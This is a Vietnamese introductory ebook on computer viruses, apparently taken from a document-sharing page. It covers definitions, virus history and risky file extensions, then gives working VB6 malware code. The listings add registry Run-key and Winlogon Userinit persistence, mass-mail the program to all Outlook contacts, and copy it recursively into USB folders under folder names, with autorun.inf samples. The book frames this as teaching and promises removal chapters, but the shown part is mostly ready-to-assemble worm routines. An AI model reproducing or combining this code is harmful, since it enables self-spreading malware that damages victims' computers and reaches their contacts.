56
Lê Nguyên Dũng Virus cơ bản Lời tựa Bạn có thể là một kỹ sư, một học sinh hay là một nhà giáo. Nhưng dù là ai thì cũng có lẽ hơn một lần bạn nghe về virus và thậm chí gặp lại vấn đề với chúng. Tuy nhiên, rõ ràng việc hiểu về chúng thật không đơn giản, các chúng làm việc và cả cái cách mà chúng làm phiền chúng càng khiến chúng trở nên bí ẩn. Cuốn sách này cố gắng nêu ra những định nghĩa cơ bản nhất và những ví dụ để bạn có thể hiểu hơn về virus. Chúng là gì ? Chúng hoạt động ra sao ? Tiêu diệt chúng như thế nào ? Dù nhiều cố gắng, nhưng cuốn sách sẽ không thể trách khỏi những sai sót. Rất mong bạn đọc hồi âm với những sai sót mà cuốn sách gặp phải.

Tong Quan Virus

Embed Size (px)

Citation preview

Page 1: Tong Quan Virus

Lê Nguyên Dũng

Virus cơ bảnLời tựa

Bạn có thể là một kỹ sư, một học sinh hay là một nhà giáo. Nhưng dù là ai thì cũng có lẽ hơn một lần bạn nghe về virus và thậm chí gặp lại vấn đề với chúng. Tuy nhiên, rõ ràng việc hiểu về chúng thật không đơn giản, các chúng làm việc và cả cái cách mà chúng làm phiền chúng càng khiến chúng trở nên bí ẩn.

Cuốn sách này cố gắng nêu ra những định nghĩa cơ bản nhất và những ví dụ để bạn có thể hiểu hơn về virus. Chúng là gì ? Chúng hoạt động ra sao ? Tiêu diệt chúng như thế nào ?Dù nhiều cố gắng, nhưng cuốn sách sẽ không thể trách khỏi những sai sót. Rất mong bạn đọc hồi âm với những sai sót mà cuốn sách gặp phải.

Page 2: Tong Quan Virus

Mục lục

Chương 1 : Một số định nghĩa cơ bảnVirus là gìLịch sử của virusVirus có thể hoạt động ở đâuMột số đuôi mở rộng có khả năng bị virus tấn côngPhân loại virusSâu máy tínhTrojanSpywareAdware

Chương 2: Virus làm gì ?I. Tạo giá trị để tự khởi động

Các khóa trong regeditGhi file

I. Lây truyềnQua EmailQua các thiết bị lưu trữMạng nội bộQua các dịch vụ IMWebQua file

II. Một số hoạt động phá hoạt khácKeyLogBackDoorLừa đảoRootkitMở cửa hậu (BackDoor)Tống tiềnXây dựng BotNetRootkit

Chương 3 : Nhận dạng và tiêu diệtI. Làm sao để nhận dạng virusII. Dừng hoạt động của virus

Khái niệm về processDừng hoạt động của virusNhận dạng Rootkit

III. Quản lý các chương trình khởi động của hệ thốngVirus khởi động như thế nàoQuản lý các chương trình khởi động

IV. Khôi phục hệ thốngPhục hồi các thư mục ẩnPhục hồi Task Manager-Regedit-MSConfigBị LogOut khi vừa hiện màn hình DesktopKhởi động máy tới màn hình Desktop thì dừng lại

V. Một số kỹ thuật khácĐể Internet Explorer an toàn hơnKhông cho virus lây qua Yahoo Messenger gửi thông điệpKiểm tra 1 liên kết có virus hay khôngNhận biết nhanh virus giả dạng thư mụcLàm sạch USBTránh autorun của USBNghịch Bkav

Chương 4 : Một số phần mềm cần biếtPhần mềm giúp nhận dạng và tiêu diệtPhần mềm chống virus

Page 3: Tong Quan Virus

Quét virus online

Chương 5 : Tự diệt một số virusFunnyIMKavo

Page 4: Tong Quan Virus

Chương 1 :

Trong chương này chúng ta sẽ đi sâu vào tìm hiểu những khái niệm về virus. Từ virus thông thường mà chúng ta thường dùng thực ra chỉ là một cái tên chung của nhiều loại mã độc riêng lẽ mà thôi. Chương này sẽ giải thích từng khái niệm mã độc này.

Virus máy tính là gì ?Trong khoa học máy tính, virus máy tính (thường được người sử dụng gọi tắt là virus) là những chương trình hay đoạn mã được thiết kế để tự nhân bản và sao chép chính nó vào các đối tượng lây nhiễm khác (file, ổ đĩa, máy tính ..).

Lịch sử virus máy tínhCó nhiều quan điểm khác nhau về lịch sử của virus điện toán. Ở đây chỉ nêu rất vắn tắt và khái quát những điểm chung nhất và, qua đó, chúng ta có thể hiểu chi tiết hơn về các loại virus:

Năm 1949: John von Neuman (1903-1957) phát triển nền tảng lý thuyết tự nhân bản của một chương trình cho máy tính. Vào cuối thập niên 1960 đầu thập niên 1970 đã xuất hiện trên các máy Univax 1108 một chương trình gọi là "Pervading Animal" tự nó có thể nối với phần sau của các tập tin tự hành. Lúc đó chưa có khái niệm virus. Năm 1981: Các virus đầu tiên xuất hiện trong hệ điều hành của máy tính Apple II. Năm 1983: Tại Đại Học miền Nam California, tại Hoa Kỳ, Fred Cohen lần đầu đưa ra khái niệm computer virus như định nghĩa ngày nay. Năm 1986: Virus "the Brain", virus cho máy tính cá nhân (PC) đầu tiên, được tạo ra tại Pakistan bởi Basit và Amjad. Chương trình này nằm trong phần khởi động (boot sector) của một dĩa mềm 360Kb và nó sẽ lây nhiễm tất cả các ổ đĩa mềm. Cũng trong tháng 12 năm này, virus cho DOS được khám phá ra là virus "VirDem". Nó có khả năng tự chép mã của mình vào các tệp tự thi hành (executable file) và phá hoại các máy tính VAX/VMS. Năm 1987: Virus đầu tiên tấn công vào command.com là virus "Lehigh". Năm 1988: Virus Jerusalem tấn công đồng loạt các đại học và các công ty trong các quốc gia vào ngày thứ Sáu 13. Đây là loại virus hoạt động theo đồng hồ của máy tính (giống bom nổ chậm cài hàng loạt cho cùng một thời điểm). Tháng 11 cùng năm, Robert Morris, 22 tuổi, chế ra worm chiếm cứ các máy tính của ARPANET, làm liệt khoảng 6.000 máy. Morris bị phạt tù 3 năm và 10.000 dollar. Mặc dù vậy anh ta khai rằng chế ra virus vì "chán đời" (boresome). Năm 1990: Chương trình thương mại chống virus đầu tiên ra đời bởi Norton. Năm 1991: Virus đa hình (polymorphic virus) ra đời đầu tiên là virus "Tequilla". Loại này biết tự thay đổi hình thức của nó, gây ra sự khó khăn cho các chương trình chống virus. Năm 1994: Những người thiếu kinh nghiệm, vì lòng tốt đã chuyển cho nhau một điện thư cảnh báo tất cả mọi người không mở tất cả những điện thư có cụm từ "Good Times" trong dòng bị chú (subject line) của chúng. Đây là một loại virus giả (hoax virus) đầu tiên xuất hiện trên các điện thư và lợi dụng vào "tinh thần trách nhiệm" của các người nhận được điện thư này để tạo ra sự luân chuyển. Năm 1995: Virus văn bản (macro virus) đầu tiên xuất hiện trong các mã macro trong các tệp của Word và lan truyền qua rất nhiều máy. Loại virus này có thể làm hư hệ điều hành chủ. Macro virus là loại virus viết ra bằng ngôn ngữ lập trình Visual Basic cho các ứng dụng (VBA) và tùy theo khả năng, có thể lan nhiễm trong các ứng dụng văn phòng của Microsoft như Word, Excel, PowerPoint, OutLook,.... Loại macro này, nổi tiếng có virus Baza và virus Laroux, xuất hiện năm 1996, có thể nằm trong cả Word hay Excel. Sau này, virus Melissa, năm 1997, tấn công hơn 1 triệu máy, lan truyền bởi một tệp đính kèm kiểu Word bằng cách đọc và gửi đến các địa chỉ của Outlook trong các máy đã bị nhiễm virus. Virus Tristate, năm 1999, có thể nằm trong các tệp Word, Excel và Power Point. Năm 2000: Virus Love Bug, còn có tên ILOVEYOU, đánh lừa tính hiếu kì của mọi người. Đây là một loại macro virus. Đặc điểm là nó dùng đuôi tập tin dạng "ILOVEYOU.txt.exe". Lợi dụng điểm yếu của Outlook thời bấy giờ: theo mặc định sẵn, đuôi dạng .exe sẽ tự động

Page 5: Tong Quan Virus

bị dấu đi. Ngoài ra, virus này còn có một đặc tính mới của spyware: nó tìm cách đọc tên và mã nhập của máy chủ và gửi về cho tay hắc đạo. Khi truy cứu ra thì đó là một sinh viên người Philippines. Tên này được tha bổng vì Philippines chưa có luật trừng trị những người tạo ra virus cho máy tính. Năm 2002: Tác giả của virus Melissa, David L. Smith, bị xử 20 tháng tù. Năm 2003: Virus Slammer, một loại worm lan truyền với vận tốc kỉ lục, truyền cho khoảng 75 ngàn máy trong 10 phút. Năm 2004: Đánh dấu một thế hệ mới của virus là worm Sasser. Với virus này thì người ta không cần phải mở đính kèm của điện thư mà chỉ cần mở lá thư là đủ cho nó xâm nhập vào máy. Cũng may là Sasser không hoàn toàn hủy hoại máy mà chỉ làm cho máy chủ trở nên chậm hơn và đôi khi nó làm máy tự khởi động trở lại. Tác giả của worm này cũng lập một kỉ lục khác: tay hắc đạo (hacker) nổi tiếng trẻ nhất, chỉ mới 18 tuổi, Sven Jaschan, người Đức. Tuy vậy, vì còn nhỏ tuổi, nên vào tháng 7 năm 2005 nên tòa án Đức chỉ phạt anh này 3 năm tù treo và 30 giờ lao động công ích. Với khả năng của các tay hacker, virus ngày ngay có thể xâm nhập bằng cách bẻ gãy các rào an toàn của hệ điều hành hay chui vào các chổ hở của các phần mềm nhất là các chương trình thư điện tử, rồi từ đó lan tỏa khắp nơi theo các nối kết mạng hay qua thư điện tử. Do dó, việc truy tìm ra nguồn gốc phát tán virus sẽ càng khó hơn nhiều. Chính Microsoft, hãng chế tạo các phần mềm phổ biến, cũng là một nạn nhân. Họ đã phải nghiên cứu, sửa chữa và phát hành rất nhiều các phần mềm nhằm sửa các khuyết tật của phần mềm cũng như phát hành các thế hệ của gói dịch vụ (service pack) nhằm giảm hay vô hiệu hóa các tấn công của virus. Nhưng dĩ nhiên với các phần mềm có hàng triệu dòng mã nguồn thì mong ước chúng hoàn hảo theo ý nghĩa của sự an toàn chỉ có trong lý thuyết. Đây cũng là cơ hội cho các nhà sản xuất các loại phần mềm bảo vệ có đất dụng võ. Tương lai không xa có lẽ virus sẽ tiến thêm các bước khác như: nó bao gồm mọi điểm mạnh sẵn có (polymorphic, sasser hay tấn công bằng nhiều cách thức, nhiều kiểu) và còn kết hợp với các thủ đọan khác của phần mềm gián điệp (spyware). Đồng thời nó có thể tấn công vào nhiều hệ điều hành khác nhau chứ không nhất thiết nhắm vào một hệ điều hành độc nhất như trong trường hợp của Windows hiện giờ. Và có lẽ virus sẽ không hề (thậm chí là không cần) thay đổi phương thức tấn công: lợi dụng điểm yếu của máy tính cũng như chương trình.

Virus có ở đâu ?Có nhiều người nhầm tưởng virus chỉ tồn tại trên máy tính và chỉ xuất hiện trên hệ điều hành phổ biến là Windows. Tuy nhiên thật ra không phải vậy.Hiện nay virus không chỉ tồn tại trên hệ điều hành Windows mà tại bất kỳ hệ điều hành (Thông dụng) nào đều đã có sự xuất hiện của virus. Linux, Unix, MacOS với máy tính và ngay cả hệ điều hành Sysbian dành cho điện thoại di động đều đã có những virus lây nhiễm.

Tuy nhiên, do tính phổ biến là cao nhất nên không có gì khó hiểu mà hệ điều hành Windows trở thành hệ điều hành mà nhiều virus đã và đang xuất hiện nhiều nhất.

Một số đuôi mở rộng có khả năng bị virus tấn công .bat: Microsoft Batch File (Tệp xử lí theo lô) .chm: Compressed HTML Help File (Tệp tài liệu dưới dạng nén HTML) .cmd: Command file for Windows NT (Tệp thực thi của Windows NT) .com: Command file (program) (Tệp thực thi) .cpl: Control Panel extension (Tệp của Control Panel) .doc: Microsoft Word (Tệp của chương trình Microsoft Word) .exe: Executable File (Tệp thực thi) .hlp: Help file (Tệp nội dung trợ giúp người dùng) .hta: HTML Application (Ứng dụng HTML) .js: JavaScript File (Tệp JavaScript) .jse: JavaScript Encoded Script File (Tệp mã hoá JavaScript) .lnk: Shortcut File (Tệp đường dẫn) .msi: Microsoft Installer File (Tệp cài đặt)

Page 6: Tong Quan Virus

.pif: Program Information File (Tệp thông tin chương trình) .reg: Registry File .scr: Screen Saver (Portable Executable File) .sct: Windows Script Component .shb: Document Shortcut File .shs: Shell Scrap Object .vb: Visual Basic File .vbe: Visual Basic Encoded Script File .vbs: Visual Basic File .wsc: Windows Script Component .wsf: Windows Script File .wsh: Windows Script Host File .{*}: Class ID (CLSID) File Extensions

Tuy nhiên bạn nên tránh ngộ nhận. Không phải bắt buộc những file mang đuôi mở rộng như trên đều là virus, nó chỉ là những phần mở rộng có nhiều khả năng bị virus tấn công mà thôi.

Phân loại virusTùy vào cách thức lây nhiễm và cách thức làm việc, chúng ta có thể chia virus thành một số loại cơ bản như sau : Worm, Trojan House, Spyware (Phần mềm gián điệp), Adware (Phần mềm quảng cáo). Ngoài ra theo một số tài liệu thì còn có : Botnet, keylogger, phishing, rootkit, backdoor...

Sâu máy tính (worm): là các chương trình cũng có khả năng tự nhân bản tự tìm cách lan truyền qua hệ thống mạng. Điểm cần lưu ý ở đây, ngoài tác hại thẳng lên máy bị nhiễm, nhiệm vụ chính của worm là phá các mạng thông tin, làm giảm khả năng hoạt động hay ngay cả hủy hoại các mạng này. Nhiều nhà phân tích cho rằng worm khác với virus, họ nhấn mạnh vào đặc tính phá hoại mạng nhưng ở đây worm được là một loại virus đặc biệt.Trojan Horse : Đây là loại chương trình cũng có tác hại tương tự như virus chỉ khác là nó không tự nhân bản ra. Như thế, cách lan truyền duy nhất là thông qua các thư dây chuyền Để trừ loại này người chủ máy chỉ việc tìm ra tập tin Trojan horse rồi xóa nó đi là xong. Tuy nhiên, không có nghĩa là không thể có hai con Trojan horse trên cùng một hệ thống. Chính những kẻ tạo ra các phần mềm này sẽ sử dụng kỹ năng lập trình của mình để sao lưu thật nhiều con trước khi phát tán lên mạng. Đây cũng là loại virus cực kỳ nguy hiểm. Nó có thể hủy ổ cứng, hủy dữ liệu. Phần mềm gián điệp (spyware): Đây là loại virus có khả năng thâm nhập trực tiếp vào hệ điều hành mà không để lại "di chứng". Thường một số chương trình diệt virus có kèm trình diệt spyware nhưng diệt khá kém đối với các đợt "dịch". Phần mềm quảng cáo (adware): Loại phần mềm quảng cáo, rất hay có ở trong các chương trình cài đặt tải từ trên mạng. Một số phần mềm vô hại, nhưng một số có khả năng hiển thị thông tin kịt màn hình, cưỡng chế người sử dụng.

Chương 2 : Virus làm gì

I. Tạo khóa khởi động :Virus nhiễm vào máy tính, không tức là nó có thể “sống” trong máy tính ấy. Các virus khi muốn tiếp tục hoạt động để tiếp tục lây lan... thì bắt buộc chúng phải tìm cách để sau khi bạn tắt máy, vào lần bật máy sau thì virus ấy sẽ được kích hoạt và tiếp tục làm việc.

Để làm được điều này, các virus thường tự ghi các giá trị vào một số địa chỉ nhất định trong registry để trong lần khởi động sau của hệ điều hành thì virus ấy sẽ tiếp tục được gọi.

I.1. Khởi động hợp pháp :Trong registry có một số địa chỉ mà windows tạo ra để bạn dễ dàng đưa chương trình mình chạy sau khi máy được khởi động. Điều này cũng tương tự với một số file. Sở dĩ

Page 7: Tong Quan Virus

chúng ta có thể gọi nó đây là cách “hợp pháp” là vì với những giá trị (Chứa thông tin về file sẽ sẽ được khởi động) này thì chương trình quản lý những chương trình khởi động cùng hệ thống có sẵn trong Windows là System Configuration Utility có thể quản lý chúng.Để khởi động chương trình này, bạn chọn Start -> Run... Nhập vào giá trị : msconfig và chọn OK. Bạn chọn thẻ Startup để có thể quản lý các ứng dụng khi khởi động. Còn thẻ Services để quản lý các chương trình dịch vụ khởi động cùng hệ thống.

Cách này worm,trojan cũng thường sử dụng.

Sau đây là 3 phương thức khác nhau cùng một vài đoạn code trên VB6 thể hiện việc này.I.1.a Ghi Key trong Regedit theo các địa chỉ sau :HKEY_LOCAL_MAHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Code :Module :Option Explicit‘Khai báo các hàm APIDeclare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As LongDeclare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As LongDeclare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As LongDeclare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long

‘Khai báo các hằng sốPublic Const REG_SZ = 1 Public Const REG_BINARY = 3 Public Const HKEY_CURRENT_USER = &H80000001Sub SaveString(hKey As Long, strPath As String, strValue As String, strData As String)‘Hàm ghi giá trị vào Registry Dim Ret RegCreateKey hKey, strPath, Ret RegSetValueEx Ret, strValue, 0, REG_SZ, ByVal strData, Len(strData) RegCloseKey RetEnd SubSub DelSetting(hKey As Long, strPath As String, strValue As String)‘Hàm xóa khóa trong Registry Dim Ret RegCreateKey hKey, strPath, Ret RegDeleteValue Ret, strValue RegCloseKey RetEnd SubForm :‘Biến lưu trữ đường dẫn virusDim AppVirus As String

Private Sub Form_Load()

‘Đoạn mã xác định đường dẫn virusIf Len(App.Path) <> 3 Then AppVirus = App.Path + "\" + App.exename + (“.exe”)Else AppVirus = App.Path + App.exename + (“.exe”)End If ‘Thao tác ghi key khởi động

Page 8: Tong Quan Virus

SaveString HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", "DungCoi", AppVirus

‘Thao tác xóa key khởi động‘ DelSetting HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", "DungCoi"End Sub‘Chú ý : Phần DungCoi ở đây là Tên Key‘ Phần AppVirus là đường dẫn File của bạn

Bạn chú ý với phương pháp ghi key như sau sẽ bị một số phần chống virus nhận dạng và chặn lại nên rất hiếm gặp kiểu ghi key này (Ngoại trừ các virus trên VBScript vẫn sử dụng).Set reg = CreateObject("WScript.Shell")reg.regwrite "HKEY_LOCAL_MAHINE\Software\Microsoft\Windows\CurrentVersion\Run\Start", App.Path + "\" + App.EXEName + ".exe"

I.1.b Phương pháp sử dụng thư mục khởi động : C:\Documents and Settings\DungCoi\Start Menu\Programs\StartupDungCoi = Tên sử dụng trong hệ thốngI.1. Khởi động bất hợp pháp :Ngược lại với các khởi động “hợp pháp” ở phía trên, đây là những cách khởi động mà chương trình quản lý các trình khởi động cùng hệ thống sẽ không quản lý.Bạn nên chú ý, không giống như các key đã nói ở trên các key sắp được nói đến khá nguy hiểm nếu bạn không hiểu chúng làm gì. Các key này cũng là các thông tin rất quan trọng khi bạn diệt virus để đảm bảo Windows vẫn làm việc bình thường.

Sửa đổi Key trong Regedit : Đường dẫn key : HKEY_LOCAL_MAHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserinitGía trị mặc định : C:\Windows\System32\userinit.exeVới C:\Windows là thư mục cài đặt hệ điều hành.

Đường dẫn key : HKEY_LOCAL_MAHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ShellGía trị mặc định : explorer.exe (Hay C:\Windows\explorer.exe)Với C:\Windows là thư mục cài đặt hệ điều hành.

Đường dẫn ghi ở 2 key này sẽ được Windows khởi động ngay cả trong SafeMode. Đây cũng chính là lý do mà một số virus vẫn hoạt động ngay cả khi bạn làm việc trên SafeMode của hệ điều hành.

Ý nghĩa các key Khi Windows khởi động qua màn hình chào (Welcome), Windows sẽ tiếp tục đọc giá trị ở key Userinit để tìm chương trình để khởi động tiếp theo.Với giá trị là file userinit.exe thông thường, thì file userinit.exe này sẽ được chạy. Sau đó file này tiếp tục gọi explorer.exe và chúng ta có môi trường làm việc trên explorer.exe.Vấn đề lớn sẽ xảy ra nếu hệ điều hành không thể khởi động có đường dẫn tương ứng với giá trị tại key Userinit. Lúc này file explorer.exe không gọi và chúng ta sẽ bị Log Out trở lại màn hình Welcome.Hiện tượng này đã xảy ra với rất nhiều người dùng.

Các virus khi ghi giá trị là đường dẫn của mình vào key Userinit thường ghi thành dạng như sau :Đường dẫn key : HKEY_LOCAL_MAHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserinitGía trị: C:\Windows\System32\userinit.exe, Đường dẫn virusVới C:\Windows là thư mục cài đặt hệ điều hành.

Page 9: Tong Quan Virus

Điều này có nghĩa rằng, cả userinit.exe và cả virus đều được chạy. Và như thế hệ điều hành vẫn sẽ không hiện tượng gì bất ổn mà virus vẫn sẽ được khởi động. Đây là một giải pháp an toàn.

Tuy nhiên không phải virus nào cùng làm vậy, một số virus đã ghi vào key này với giá trị chính là đường dẫn virus. Điều này đồng nghĩa với việc chỉ có virus đó được kích hoạt khi khởi động với key Userinit. Lúc này, nếu virus không gọi file explorer.exe thì hệ thống sẽ bị ngừng hoạt động.Đây là vấn đề rất lớn mà rất đông người dùng máy tính gần đây mắc phải.Để tránh tình trạng tê liệt này, bạn nên chú ý tới các key này khi diệt virus.Code : (Code mẫu với Key Userinit ) Module :Option Explicit‘Các hàm API để tác động vào registryDeclare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As LongDeclare Function RegCreateKey Lib "advapi32.dll" _ Alias "RegCreateKeyA" ( _ ByVal hKey As Long, _ ByVal lpSubKey As String, _ phkResult As Long) As LongDeclare Function RegSetValueEx Lib "advapi32.dll" _ Alias "RegSetValueExA" ( _ ByVal hKey As Long, _ ByVal lpValueName As String, _ ByVal Reserved As Long, _ ByVal dwType As Long, _ lpData As Any, _ ByVal cbData As Long) As Long‘Hàm API để xác định thư mục hệ thốngDeclare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

‘Khai báo các hằng sốPublic Const REG_SZ = 1Public Const REG_BINARY = 3Public Const HKEY_CURRENT_USER = &H80000001Public Const HKEY_LOCAL_MACHINE = &H80000002Sub SaveString(hKey As Long, strPath As String, strValue As String, strData As String)‘Hàm ghi giá trị vào Registry Dim Ret RegCreateKey hKey, strPath, Ret RegSetValueEx Ret, strValue, 0, REG_SZ, ByVal strData, Len(strData) RegCloseKey RetEnd Sub

Function WindowsDir() As String‘Hàm xác định đường dẫn thư mục hệ thống Dim WindirS As String * 255 Dim Temp Dim Result Temp = GetWindowsDirectory(WindirS, 255) Result = Left(WindirS, Temp) WindowsDir = ResultEnd FunctionForm :‘Biến lưu đường dẫn virusDim AppVirus As String

Page 10: Tong Quan Virus

‘Biến lưu đường dẫn file explorer.exeDim PathExp As String

Private Sub Form_Load()

‘Khởi tạo giá trị cho biến PathExp = WindowsDir & “\explorer.exe”‘Xác định đường dẫn virusIf Len(App.Path) <> 3 Then AppVirus = App.Path + "\" + App.exename + (“.exe”)Else AppVirus = App.Path + App.exename + (“.exe”)End If ‘Gọi explorer.exe Shell PathExp ‘Ghi giá trị vào registry SaveString HKEY_LOCAL_MACHINE, “SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”, “Userinit”, AppVirus

End Sub‘Phần AppVirus là đường dẫn File của bạn‘Câu lệnh Shell PathExp là rất cần thiết

Có lẽ tới đây bạn có thể hiểu, việc đoạn code trên phải có dòng lệnh Shell PathExp là để tránh hệ thống bị tê liệt.

I.1.c. Một số key khácWindows thực hiện các lệnh trong khu vực HKEY_CLASSES_ROOT\exefile\shell\open\command "%1" %* của Registry. Lệnh nhúng ở đây sẽ mở khi bất kỳ file chạy nào được thực thi.

Có thể có những file khác:

[HKEY_CLASSES_ROOT\exefile\shell\open\command] ="\"%1\" %*" [HKEY_CLASSES_ROOT\comfile\shell\open\command] ="\"%1\" %*" [HKEY_CLASSES_ROOT\batfile\shell\open\command] ="\"%1\" %*" [HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] ="\"%1\" %*" [HKEY_CLASSES_ROOT\piffile\shell\open\command] ="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] ="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] ="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] ="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] ="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] ="\"%1\" %*"

Nếu các khoá không có giá trị "\"%1\" %*" như trên và bị thay đổi một số thứ kiểu như "\"somefilename.exe %1\" %*" thì chúng sẽ tự động gọi một file đặc tả.

2. Lây nhiễm :a. Email :Lây truyền qua email là phương thức cơ bản nhất của virus sử dụng mạng internet để truyền nhiễm.Dù là một phương thức đã tồn tại khá lâu, nhưng đến hiện nay, đây vẫn là một phương thức được rất nhiều virus sử dụng.

Page 11: Tong Quan Virus

Sau đây là một đoạn mã minh họa quá trình gửi email từ một máy đã bị lây nhiễm qua email của những người khác thông qua việc liệt kê danh sách email những người đã từng có liên hệ với máy nạn nhân trên Outlook Explorer (OE).

‘Xác định đường dẫn virusDim AppVirus As StringIf Len(App.Path) <> 3 Then AppVirus = App.Path + "\" + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101))Else AppVirus = App.Path + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101))End IfSet go = CreateObject(fgo)Set St = CreateObject(“Outlook.Application”)Set out = Wscript.CreateObject(“Outlook.Application”)Set MAPI = out.GetNameSpace(“MAPI”)Set a = MAPI.AddressLists(1)For X = 1 To a.AddressEntries.CountSet Mail = St.CreateItem(0)Mail.To = St.GetNameSpace(“MAPI”).AddressLists(1).AddressEntries(X) Mail.Subject = “Tên nội dung Mail” ‘Ví dụ : This is card Valentine Mail.Body = “Nội dung email” ‘Ví dụ : This is my lover Mail.Attachments.Add = AppVirus ‘Đây là phần file đính kèmMail.SendNext

St.Quit

2. Qua các thiết bị lưu trữTrước kia phương thức lây truyền virus qua đĩa mềm khá phổ biến, cùng với việc đĩa mềm ngày càng ít được sử dụng và được thay thế bằng ổ đĩa USB thì phương thức lây truyền qua đĩa mềm dần được thay thế bằng phương pháp lây truyền qua đĩa USB.Cũng có một số (Dù không nhiều) tự nhân bản vào đĩa CD, DVD... rồi chờ đợi những nạn nhân khác nhau.

Sau đây là các bước một virus thường làm để lây truyền qua đĩa USB.1. Tìm ổ đĩa USB (Xem có tồn tại không)- Liệt kê tất cả ổ đĩa- Kiểm tra xem trong các ổ đĩa đó, ổ đĩa nào là đĩa giao tiếp qua USB.2. Sau khi thực hiện bước này, có 2 cách lây nhiễm vào USB chủ yếu như sau :a. Virus tự nhân bản mình vào một địa chỉ nhất định trên USB, rồi tạo file autorun.inf trong USB nhằm tự kích hoạt mình nếu máy nào đó bất cẩn khi sử dụng đĩa USB đó.b. Virus sẽ liệt kê toàn bộ thư mục có trong USB. Tại mỗi thư mục đó virus sẽ tự nhân bản mình giả dạng 1 thư mục con của tư mục đó (Thường thì các virus này sẽ biểu tượng giống hình một thư mục thông thường).

Ở cách 2.b virus sẽ tạo file autorun.inf có cấu trúc như sau :[Autorun]OPEN=Đường dẫn virus trong đĩa USB

Trên đây chỉ là cấu trúc cơ bản. Cấu trúc này có thể có sự khác biệt, ví dụ trong trường hợp sau :[AutoRun]open=pagefile.pifshell\open=´ò¿ª(&O)shell\open\Command=pagefile.pifshell\open\Default=1shell\explore=×ÊÔ´¹ÜÀíÆ÷(&X)

Page 12: Tong Quan Virus

shell\explore\Command=pagefile.pif

Dù file ở dưới quy định nhiều thuộc tính hơn, nhưng về chức năng cơ bản thì không đổi.Chức năng của file này là sẽ tạo cho đĩa USB có chế độ Autorun. Ở chế độ này, khi người dùng mở đĩa USB đó theo cách thông thường (Như nháy đúp vào file đó) thì thay vì đĩa USB đó được mở sẽ tự động chạy file có đường dẫn lưu trữ tại khóa có giá trị OPEN.Bạn rất khó nhận ra sự khác biết giữa việc Open bình thường của đĩa USB với việc Autorun này. Lý do là các virus được kích hoạt ở trong đĩa USB sẽ mở thư mục của đĩa USB ra.

Sau đây là một đoạn mã thể hiện quá trình lây nhiễm theo cách 2.b :

‘Code bởi DungCoi‘Email : [email protected] Private Sub Form_Load()Dim AppVirus As String‘Xác định đường dẫn virusIf Len(App.Path) <> 3 ThenAppVirus = App.Path + "\" + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101))ElseAppVirus = App.Path + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101))End IfDim d, dcDim fso, cfSet fso = CreateObject("Scripting.FileSystemObject")Set dc = fso.Drives

‘Thao tác liệt kê ổ đĩa, sau đó tìm các đĩa rời và có tên khác “A”For Each d In dcIf (d.DriveType = 1) And (UCase(Left(d, 1)) <> "A") ThenSet cf = fso.GetFolder(d).subfolders‘Liệt kê tất cả thư mục trong thư mục hiện tạiFor Each fil In cfIf TonTai(fil.Path & "\" & fil.Name & (Chr(46) + Chr(101) + Chr(120) + Chr(101))) = False Then FileCopy AppVirus, fil.Path & "\" & fil.Name & (Chr(46) + Chr(101) + Chr(120) + Chr(101))TimThuMuc (fil.Path)NextEnd IfNextEnd Sub

Private Sub TimThuMuc(ThuMuc As String)‘Thao tác tìm thư mụcDim fso, cf, fil, extSet fso = CreateObject(("Scripting.FileSystemObject")Set cf = fso.GetFolder(ThuMuc).subfolders‘Liệt kê tất cả thư mục trong thư mục hiện tạiFor Each fil In cfFileCopy AppVirus, fil.Path & "\" & fil.Name & (Chr(46) + Chr(101) + Chr(120) + Chr(101))‘Thực hiện đệ quy để tiếp tục liệt kê theo chiều sâuTimThuMuc (fil.Path)NextEnd Sub

Private Function TonTai(filename) As Boolean‘Hàm kiểm tra sự tồn tại của File

Page 13: Tong Quan Virus

On Error GoTo ErrorHandlerTonTai = (Dir(filename) <> "")Exit FunctionErrorHandler:TonTai = FalseEnd Function3. Mạng nội bộVirus sẽ tìm tất cả các thư mục trong cùng mạng nội bộ (Của máy nạn nhân) xem có thư mục nào chia sẽ (Share) và cho phép sửa chữa chúng hay không. Không đó chúng sẽ tự sao chép và chờ đợi một ai đó vô ý chạy chúng.

